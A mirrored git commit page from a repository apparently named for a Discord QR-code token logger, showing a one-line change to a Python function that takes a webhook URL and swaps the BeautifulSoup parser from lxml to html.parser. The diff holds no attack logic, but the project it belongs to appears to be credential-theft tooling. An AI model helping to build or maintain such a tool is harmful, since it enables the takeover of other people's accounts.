mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-07-28 21:45:28 +00:00
updating parser
This commit is contained in:
parent
ae1fac3fc8
commit
83e4eb31fb
@ -69,7 +69,7 @@ def main(webhook_url: str) -> None:
|
||||
time.sleep(5)
|
||||
# number of issues.
|
||||
|
||||
source = BeautifulSoup(main.driver.page_source, features='lxml')
|
||||
source = BeautifulSoup(main.driver.page_source, features='html.parser')
|
||||
|
||||
qrg = QRGrabber('resources')
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user